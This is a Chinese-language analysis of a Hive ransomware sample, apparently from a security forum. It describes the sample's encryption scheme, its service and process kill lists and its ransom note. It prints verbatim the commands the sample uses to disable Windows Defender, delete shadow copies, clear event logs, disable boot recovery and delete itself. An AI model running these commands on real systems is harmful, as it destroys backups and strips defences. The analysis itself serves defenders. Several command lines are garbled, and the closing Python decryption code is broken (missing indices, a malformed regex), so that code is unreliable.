Hive勒索病毒样本分析
相关阅读:Hive勒索病毒家族详情概述
Hive勒索病毒家族于2021年6月被首次发现,之后也保持着非常活跃的攻击趋势 该hive病毒样本同样采用了非对称+对称算法的加密方案,但是在文件加密阶段使用的对称加密算法有别于主流加密方式。Hive在加密文件时并未采用标准的对称加密算法,如AES、DES、salsa20、RC4等,而是使用了自定义的流加密方式。
代码分析
当前Hive样本采用GO语言进行编译,且对大量函数名进行字符串混淆,以增强对自身的代码保护。
Hive支持使用执行参数开启相应的功能,当前样本支持的参数及其含义如下表所示:
1.密钥生成&导出
Hive采用自定义的对称加密算法对目标文件进行加密,算法类型属于流加密,密钥流为0x100000字节(1MB)的随机数据。
非对称加密算法采用RSA-4096,用于对文件加密密钥流进行非对称加密。加密使用的公钥内置于病毒程序中,格式如下图:
使用RSA公钥加密后的密钥流将从0x100000字节增至0x12b880字节,接着加密后的数据被写入每个目标磁盘根目录下。文件名为:
<Custom_Base64Encode ( SHA256 ( 0x100000字节密钥流 ) + ’\xFF’ )>.key.1aevj
其中,.1aevj是加密文件后缀,hive各个样本可能有所不同。当前样本对数据进行Base64编码时,更换了Base64对照表,原始的 + 和 / 替换成了 - 和 _:
示例文件名:C:\\uW5YfSCYFaEGcSI1T4nJnKTE8tFLwv2A6Sc8sUI-Vnf_.key.1aevj。
2.结束目标服务和进程&卷影删除
Hive通过正则表达式进行服务、进程、文件名、文件类型的字符串匹配。如果程序启动时未被指定相应的执行参数,将使用默认配置。
结束的指定服务列表为:
(?i:acronis|AcrSch2Svc|Antivirus|ARSM|AVP|backup|bedbg|CAARCUpdateSvc|CASAD2DWebSvc|ccEvtMgr|ccSetMgr|Culserver|dbeng8|dbsrv12|DCAgent|DefWatch|EhttpSrv|ekrn|Enterprise Client Service|EPSecurityService|EPUpdateService|EraserSvc11710|EsgShKernel|ESHASRV|FA_Scheduler|firebird|IISAdmin|IMAP4Svc|Intuit|KAVFS|KAVFSGT|kavfsslp|klnagent|macmnsvc|masvc|MBAMService|MBEndpointAgent|McAfee|McShield|McTaskManager|memtas|mepocs|mfefire |mfemms|mfevtp|MMS|MsDtsServer|MsDtsServer100|MsDtsServer110|msexchange|msmdsrv|MSOLAP|MVArmor|MVarmor64|NetMsmqActivator|ntrtscan|oracle|PDVFSService|POP3Svc|postgres|QBCFMonitorService|QBFCService|QBIDPService|redis|report|RESvc|RTVscan|sacsvr|SamSs|SAVAdminService|SavRoam|SAVService|SDRSVC|SepMasterService|ShMonitor|Smcinst|SmcService|SMTPSvc|SNAC|SntpService|sophos|sql|SstpSvc|stc_raw_agent|^svc|swi_|Symantec|TmCCSF|tmlisten|tomcat|TrueKey|UI0Detect|veeam|vmware|vss|W3Svc|wbengine|WebClient|wrapper|WRSVC|WSBExchange|YooIT|zhudongfangyu|Zoolz)
终止的目标进程列表为:
(?i:agntsvc|sql|CNTAoSMgr|dbeng50|dbsnmp|encsvc|excel|firefoxconfig|infopath|mbamtray|msaccess|mspub|mydesktop|Ntrtscan|ocautoupds|ocomm|ocssd|onenote|oracle|outlook|PccNTMon|powerpnt|sqbcoreservice|steam|synctime|tbirdconfig|thebat|thunderbird|tmlisten|visio|word|xfssvccon|zoolz)
对于匹配到的目标服务,hive通过net.exe结束目标服务,sc.exe关闭相应服务的自启动。同时执行命令行关闭Windows Defender等反病毒产品的相应功能,降低主机防御能力,并删除卷影备份,禁止开机修复。
net.exe stop<目标服务名> /y
sc.exe config<目标服务名> start= disabled
reg.exe add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
reg.exe delete HKLM\Software\Policies\Microsoft\Windows Defender /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine /v MpEnablePus /t REG_DWORD /d 0 /fschtasks.exe /Change /TN Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh /Disable
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
reg.exe add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
reg.exe add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
schtasks.exe /Change /TN Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh /Disable
schtasks.exe /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance /Disable
schtasks.exe /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cleanup /Disable
schtasks.exe /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan /Disable
schtasks.exe /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Verification /Disable
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Windows Defender /f
reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Windows Defender /f
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
reg.exe delete HKCR\*\shellex\ContextMenuHandlers\EPP /f
reg.exe delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /fy are \r\n
reg.exe delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f
reg.exe add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
vssadmin.exe delete shadows /all /quiet
wevtutil.exe cl system
wevtutil.exe cl securityCentral Standard Time
wevtutil.exe cl application
wmic.exe SHADOWCOPY /nointeractivee
wmic.exe shadowcopy delete
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
cmd.exe /c C:\Program Files\Windows Defender\MpCmdRun.exe -RemoveDefinitions -All
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
3.搜索文件进行加密
搜索目标文件的位置包括三种:固定磁盘、可移动磁盘、网络资源。以正则表达式匹配枚举到的文件路径、文件名和文件后缀类型,匹配到则跳过:
(?i:C:\\Windows|\.(?:386|adv|ani|bat|bin|cab|cmd|com|cpl|cur|deskthemepack|diagcab|diagcfg|diagpkg|dll|drv|exe|hlp|hrmlog|hta|icl|icns|ico|ics|idx|ini|key|lnk|lock|log|mod|mpa|mp3|msc|msi|msp|msstyles|msu|nls|nomedia|ocx|prf|ps1|rom|rtp|scr|shs|spl|sys|theme|themepack|url|wpx)$|(?:autorun\.inf|bootfont\.bin|boot\.ini|bootsect\.bak|desktop\.ini|iconcache\.db|ntldr|ntuser\.dat|ntuser\.dat\.log|ntuser\.ini|thumbs\.db)$|\\(\$recycle\.bin|\$windows\.~bt|\$windows\.~ws|All users|appdata|application data|boot|google|intel|Microsoft|mozilla|Mozilla|Msbuild|msocache|perflogs|system volume information|tor browser|windows|Windows nt|windows\.old)\\|(\$\\Windows\\|\\ADMIN\$|\\IPC\$)|(?:^$))
4.文件加密方式
前面提到,hive加密文件时使用是随机生成的0x100000字节的密钥流。该密钥流被用于当前hive进程的所有加密操作中,主要使用异或(XOR)操作。
加密每个文件时,都会生成为相应的文件生成2个8字节的随机值,同时右移0x1F位,再经过取模运算后分别作为指针1(Pos1)和指针2(Pos2),指向密钥流(KeyStream)的相应偏移,两者异或后再和读取的待加密文件内容进行异或加密(解密算法附于文末,加密算法与之相同)。
每个文件被加密的内容和文件大小有关。hive采用了间隔加密方式,即通过目标文件大小计算出一个偏移增量SkipOffset和间隔读取次数值SliceCount,然后从文件首部开始,每加密0x1000(4KB)字节,文件读取指针递增一次,增量就是offset,直至跳跃次数达到SliceCount。如果文件过大,SliceCount将被限制为25,也就是说每个文件被加密内容不超过100KB。但或许是hive为了防止加密大文件时只加密了首部的无效数据,所以在跳跃次数达到25时,数据将从尾部读取进行加密。所有被加密数据片段写回原偏移。
关于文件的重命名,计算方式为:
<Custom_Base64Encode ( SHA256 ( 0x100000字节密钥流 ) + ’\xFF’ + Pos1 + Pos2 + ‘\x34’)>.1aevj。
示例:test.sql.D6_MK7wCTzIThl7FO1Xsni-0dH__g8xSJWXphhN8Fhn_VibYBDtJ8JI0.1aevj
5.数据擦除
所有文件加密完成后,hive通过清理当前进程内存的方式,擦除可能残留的密钥流。
此外,程序还会删除位于每个目标磁盘根目录下的名为temp<%d>.swap.1aevj的文件,其中%d从0开始递增,但是在分析过程中并未发现相应文件。
6.勒索信
Hive在每个被加密目录下释放勒索信,名为Ko7n_HOW_TO_DECRYPT.txt,其中的Login和Password为硬编码数据。释放完毕后,使用notepad打开C盘下的勒索信以提醒中招用户。
Your network has been breached and all data were encrypted.
Personal data, financial reports and important documents are ready to disclose.
To decrypt all the data and to prevent exfiltrated files to be disclosed at
http://hiveleakdbtnp76ulyhi52eag ... 34gd2nekazyd.onion/
you will need to purchase our decryption software.
Please contact our sales department at:
http://hivecust6vhekztbqgdnkks64 ... dp57zoq3ooqd.onion/
Login: *****
Password: *****
To get an access to .onion websites download and install Tor Browser at:
https://www.torproject.org/ (Tor Browser is not related to us)
Follow the guidelines below to avoid losing your data:
- Do not modify, rename or delete *.key.1aevj files. Your data will be
undecryptable.
- Do not modify or rename encrypted files. You will lose them.
- Do not report to the Police, FBI, etc. They don't care about your business.
They simply won't allow you to pay. As a result you will lose everything.
- Do not hire a recovery company. They can't decrypt without the key.
They also don't care about your business. They believe that they are
good negotiators, but it is not. They usually fail. So speak for yourself.
- Do not reject to purchase. Exfiltrated files will be publicly disclosed.
7.自我删除
完成以上所有流程后,程序将主席那个以下命令进行自我清除:
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del<self_path>
解密算法
需要注意的是,下附的解密算法需要获取被RSA加密的密钥流的原始数据才能解密。
def decrypt(idx0, idx1):
plaintext = ''
pos0 = idx0 % 0xe7000
pos1 = idx1 % 0xff400
for i in range(len(ciphertext)):
plaintext += chr(ord(ciphertext) ^ ord(xorstream) ^ ord(xorstream))
return plaintext
xorstream = [......] # 0x100000 bytes
# eg: filename = test.txt.pn8sy0cwfprbSDAxLQm7m1WiYiWyCa3EiCLh2QBceKn_om7fld75sDM0.1aevj
info = re.search(\.(+)\.1aevj, filename, flags = re.IGNORECASE)
if info:
b64Str = info.groups().replace('-', '+').replace('_', '/')
k = b64decode(b64Str)
plaintext = decrypt(struct.unpack('<I', k[:4]), struct.unpack('<I', k))
页:
[1]